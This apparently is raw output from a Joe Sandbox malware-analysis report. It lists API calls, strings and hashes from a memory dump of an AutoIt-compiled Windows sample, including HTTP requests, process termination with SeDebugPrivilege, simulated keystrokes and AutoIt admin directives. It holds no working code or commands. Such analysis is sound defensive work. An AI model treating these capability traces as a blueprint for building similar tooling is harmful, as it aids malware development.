                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003A45F0
                                                                                                                      • CoUninitialize.COMBASE ref: 003A4695
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 003A47BD
                                                                                                                      • DestroyWindow.USER32(?), ref: 00415936
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0041599D
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004159CA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00409926
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 0040993A
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00409954
                                                                                                                      • _wcscat.LIBCMT ref: 004099AF
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 004099C6
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004099F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: @U=u$SysListView32
                                                                                                                      • API String ID: 307300125-1908207174
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003F4C5E
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003F4C8A
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003F4CCC
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003F4CE1
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003F4CEE
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003F4D1E
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003F4D65
                                                                                                                        • Part of subcall function 003F56A9: GetLastError.KERNEL32(?,?,003F4A2B,00000000,00000000,00000001), ref: 003F56BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1241431887-3916222277
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00408DF4
                                                                                                                      • GetWindowLongW.USER32(00F39310,000000F0), ref: 00408E27
                                                                                                                      • GetWindowLongW.USER32(00F39310,000000F0), ref: 00408E5C
                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00408E8E
                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00408EB8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00408EC9
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408EE3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 2178440468-2594219639
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0043DBF0), ref: 003FBBA1
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0043DBF0), ref: 003FBBD5
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003FBD33
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 003FBD5D
                                                                                                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 003FBEAD
                                                                                                                      • ProgIDFromCLSID.COMBASE(?,?), ref: 003FBEF7
                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 003FBF14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793797124-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003A4954,00000000), ref: 003A4A23
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003BB85B), ref: 003BB926
                                                                                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,003BB85B,00000000,?,?,003BAF1E,?,?), ref: 003BB9BD
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0041E775
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041E7EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2402799130-0
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 003BF737
                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 003BF77E
                                                                                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 0041EB55
                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0041E9A0,00000004,00000000,00000000), ref: 0041EBC1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 003DE158
                                                                                                                        • Part of subcall function 003DE138: GetCurrentThreadId.KERNEL32 ref: 003DE15F
                                                                                                                        • Part of subcall function 003DE138: AttachThreadInput.USER32(00000000,?,003DCDFB,?,00000001), ref: 003DE166
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003DCE06
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003DCE23
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003DCE26
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003DCE2F
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003DCE4D
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003DCE50
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003DCE59
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003DCE70
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003DCE73
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DA857: CLSIDFromProgID.COMBASE ref: 003DA874
                                                                                                                        • Part of subcall function 003DA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 003DA88F
                                                                                                                        • Part of subcall function 003DA857: lstrcmpiW.KERNEL32(?,00000000), ref: 003DA89D
                                                                                                                        • Part of subcall function 003DA857: CoTaskMemFree.COMBASE(00000000), ref: 003DA8AD
                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 003FC6AD
                                                                                                                      • _memset.LIBCMT ref: 003FC6BA
                                                                                                                      • _memset.LIBCMT ref: 003FC7D8
                                                                                                                      • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 003FC804
                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 003FC80F
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 003FC85D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00401B09
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00401B17
                                                                                                                      • __wsplitpath.LIBCMT ref: 00401B45
                                                                                                                        • Part of subcall function 003C297D: __wsplitpath_helper.LIBCMT ref: 003C29BD
                                                                                                                      • _wcscat.LIBCMT ref: 00401B5A
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00401BD0
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00401BE2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID: hEE
                                                                                                                      • API String ID: 1380811348-842878421
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003E6F7D
                                                                                                                        • Part of subcall function 003E6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E6F8D
                                                                                                                        • Part of subcall function 003E6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003E7022
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040168B
                                                                                                                      • GetLastError.KERNEL32 ref: 0040169E
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004016CA
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00401746
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00401751
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401786
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00461810,00000000,?,?,00461810,00461810,?,0041E2D6), ref: 0040E21B
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0040E23F
                                                                                                                      • ShowWindow.USER32(00461810,00000000,?,?,00461810,00461810,?,0041E2D6), ref: 0040E29F
                                                                                                                      • ShowWindow.USER32(?,00000004,?,?,00461810,00461810,?,0041E2D6), ref: 0040E2B1
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 0040E2D5
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040E2F8
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 642888154-2594219639
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 003E62D6
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 003E7595
                                                                                                                      • LoadStringW.USER32(00000000), ref: 003E759C
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003E75B2
                                                                                                                      • LoadStringW.USER32(00000000), ref: 003E75B9
                                                                                                                      • _wprintf.LIBCMT ref: 003E75DF
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003E75FD
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 003E75DA
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00402AE7
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479070676-0
                                                                                                                      APIs
                                                                                                                      • select.WS2_32 ref: 003F9B38
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9B45
                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 003F9B6F
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9B9F
                                                                                                                      • htons.WS2_32(?), ref: 003F9C51
                                                                                                                      • inet_ntoa.WS2_32(?), ref: 003F9C0C
                                                                                                                        • Part of subcall function 003DE0F5: _strlen.LIBCMT ref: 003DE0FF
                                                                                                                        • Part of subcall function 003DE0F5: _memmove.LIBCMT ref: 003DE121
                                                                                                                      • _strlen.LIBCMT ref: 003F9CA7
                                                                                                                      • _memmove.LIBCMT ref: 003F9D10
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3637404534-0
                                                                                                                      APIs
                                                                                                                      • __mtinitlocknum.LIBCMT ref: 003CB744
                                                                                                                        • Part of subcall function 003C8A0C: __FF_MSGBANNER.LIBCMT ref: 003C8A21
                                                                                                                        • Part of subcall function 003C8A0C: __NMSG_WRITE.LIBCMT ref: 003C8A28
                                                                                                                        • Part of subcall function 003C8A0C: __malloc_crt.LIBCMT ref: 003C8A48
                                                                                                                      • __lock.LIBCMT ref: 003CB757
                                                                                                                      • __lock.LIBCMT ref: 003CB7A3
                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00456948,00000018,003D6C2B,?,00000000,00000109), ref: 003CB7BF
                                                                                                                      • RtlEnterCriticalSection.NTDLL(8000000C), ref: 003CB7DC
                                                                                                                      • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 003CB7EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1422805418-0
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 003EA1CE
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003EA205
                                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 003EA221
                                                                                                                      • _memmove.LIBCMT ref: 003EA26F
                                                                                                                      • _memmove.LIBCMT ref: 003EA28C
                                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 003EA29B
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003EA2B0
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003EA2CF
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 256516436-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003A3BCF: _wcscpy.LIBCMT ref: 003A3BF2
                                                                                                                      • _wcstok.LIBCMT ref: 003F1D6E
                                                                                                                      • _wcscpy.LIBCMT ref: 003F1DFD
                                                                                                                      • _memset.LIBCMT ref: 003F1E30
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                      • String ID: X$t:Ep:E
                                                                                                                      • API String ID: 774024439-2014670428
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040214B
                                                                                                                      • _memset.LIBCMT ref: 00402214
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00402259
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003A3BCF: _wcscpy.LIBCMT ref: 003A3BF2
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402320
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040232F
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4082843840-2766056989
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 003E481D
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E4832
                                                                                                                      • SetKeyboardState.USER32(?), ref: 003E4893
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 003E48C1
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 003E48E0
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 003E4926
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003E4949
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 003E4638
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E464D
                                                                                                                      • SetKeyboardState.USER32(?), ref: 003E46AE
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003E46DA
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003E46F7
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003E473B
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003E475C
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 7e01643ee95f628d820db49745eac38456d5a80d09d471ebde7d8cb5aa2df060
                                                                                                                      • Instruction ID: 78460651b76cbd2201b082659cb94f663540ea521be1b4014cb8558f56823c80
                                                                                                                      • Opcode Fuzzy Hash: 7e01643ee95f628d820db49745eac38456d5a80d09d471ebde7d8cb5aa2df060
                                                                                                                      • Instruction Fuzzy Hash: F75118A0A047E67DFB3787368C45BB6BF995B0B304F094688E1E54A8C2D3D4EC98D790
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945705084-0
                                                                                                                      • Opcode ID: 90b3136bedeb15323bd7a7857281eaab120f648a4007ab232223ba0504b95b37
                                                                                                                      • Instruction ID: 7659612a4146a826e6661a052c7725ab4bec09057c8f1c6bb182922f26997ab1
                                                                                                                      • Opcode Fuzzy Hash: 90b3136bedeb15323bd7a7857281eaab120f648a4007ab232223ba0504b95b37
                                                                                                                      • Instruction Fuzzy Hash: 73419465C1026475CF12EBF4CC86ECFB7BC9F05710F50896AE918F7161EA30E65087A5
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 0-2594219639
                                                                                                                      • Opcode ID: ea5c76a2ad427c432e46b3d04aad2a8a78f29547b5ef43971a3114128f7d5884
                                                                                                                      • Instruction ID: 37b5241eb7fa371d69f3968c62fab2d5fa450790797d0ef2841628236be62084
                                                                                                                      • Opcode Fuzzy Hash: ea5c76a2ad427c432e46b3d04aad2a8a78f29547b5ef43971a3114128f7d5884
                                                                                                                      • Instruction Fuzzy Hash: 1741D035E04104EBD724DB28DC89FAABB79EB09320F154376E919B72E1C778AE01D658
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E1734
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E175A
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 003E175D
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003E177B
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 003E1784
                                                                                                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 003E17A9
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003E17B7
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: d26ecee4128f2832599080ce14beea358a3f3054534adab2ea150fa88448041d
                                                                                                                      • Instruction ID: be958c754edeab922f457ce7c9548c3cf748b43f2e4fc88baa1aa79239f98a3c
                                                                                                                      • Opcode Fuzzy Hash: d26ecee4128f2832599080ce14beea358a3f3054534adab2ea150fa88448041d
                                                                                                                      • Instruction Fuzzy Hash: 3F21A176700269AF9B11AFA9CC88CFF73EDEB09760B418225F915DB290DB70EC418764
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003DC684
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003DC697
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 003DC6C7
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 458670788-2258501812
                                                                                                                      • Opcode ID: 4e5b016a10e03afe73b5191efc4cc5125e4620e8d74253c97f002efd32f5011c
                                                                                                                      • Instruction ID: fcda63cf4d72b687fc06f3bbff024209368f5433dd15e725303b58dc7839bba0
                                                                                                                      • Opcode Fuzzy Hash: 4e5b016a10e03afe73b5191efc4cc5125e4620e8d74253c97f002efd32f5011c
                                                                                                                      • Instruction Fuzzy Hash: 57210472910104AEDB06AB64EC85DFEB7ADDF06350B18511AF421EB2E0DB788D0AD750
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 003E6A2B
                                                                                                                      • _wcscmp.LIBCMT ref: 003E6A49
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003E6A62
                                                                                                                        • Part of subcall function 003E6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 003E6DBA
                                                                                                                        • Part of subcall function 003E6D6D: GetLastError.KERNEL32 ref: 003E6DC5
                                                                                                                        • Part of subcall function 003E6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 003E6DD9
                                                                                                                      • _wcscat.LIBCMT ref: 003E6AA4
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 003E6B0C
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2323102230-1173974218
                                                                                                                      • Opcode ID: c0af309a3806e5f483b44d05e5e35ea9c00772209e8a1f8b48d97165de736a4e
                                                                                                                      • Instruction ID: ee015cc627ff88064d9f048a2b1f33c3666ecea363b0060ef501edfb021a8089
                                                                                                                      • Opcode Fuzzy Hash: c0af309a3806e5f483b44d05e5e35ea9c00772209e8a1f8b48d97165de736a4e
                                                                                                                      • Instruction Fuzzy Hash: BC3125B1D002686ACF51EFA4DC45BDDB7B89F18340F5045EAE505E7181EB309B49CB64
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: 1316315e1e3ecbd1535669178e0715c491499818bb75efcf9460767d30a8cb39
                                                                                                                      • Instruction ID: 20fdfb2d269a7317e269d97e2841cdaa913633f8b32afb094ba07c70f52581a5
                                                                                                                      • Opcode Fuzzy Hash: 1316315e1e3ecbd1535669178e0715c491499818bb75efcf9460767d30a8cb39
                                                                                                                      • Instruction Fuzzy Hash: A32137321046B177D237B6369C0AFB773AC9F59310F10422AF486DB5C1EBA19E82D394
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E180D
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E1833
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 003E1836
                                                                                                                      • SysAllocString.OLEAUT32 ref: 003E1857
                                                                                                                      • SysFreeString.OLEAUT32 ref: 003E1860
                                                                                                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 003E187A
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003E1888
                                                                                                                      Similarity
